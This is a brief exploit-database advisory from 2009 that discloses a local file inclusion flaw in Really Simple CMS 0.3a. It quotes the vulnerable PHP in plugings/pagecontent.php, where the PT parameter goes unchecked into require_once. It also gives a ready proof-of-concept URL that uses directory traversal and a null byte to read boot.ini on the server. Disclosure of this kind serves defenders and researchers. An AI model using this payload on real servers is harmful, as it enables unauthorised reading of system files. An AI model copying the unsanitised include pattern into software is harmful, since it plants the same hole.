id: 5582
date: 07/29/2009
title: Really Simple CMS 0.3a (pagecontent.php PT) Local File Inclusion Vuln
author: SirGod
cves: 

==============================================================================
Really Simple CMS 0.3a (pagecontent.php PT) Local File Inclusion Vulnerability
==============================================================================

###########################################################################################
[+] Really Simple CMS 0.3a (pagecontent.php PT) Local File Inclusion Vulnerability
[+] Discovered By SirGod
############################################################################################

[+] Download : http://sourceforge.net/projects/rscms/

[+] Local File Inclusion

 - Vulnerable code in plugings/pagecontent.php

-----------------------------------
if (!$PT) {
	$PT = 'text';
}
$PTF = "plugings/";
$PTF .= $PT;
$PTF .= ".php";


require_once($PTF);
-----------------------------------

 - PoC

    http://127.0.0.1/[path]/plugings/pagecontent.php?PT=../../../../../../../boot.ini%00

############################################################################################




#  0day.today [2023-03-25]  #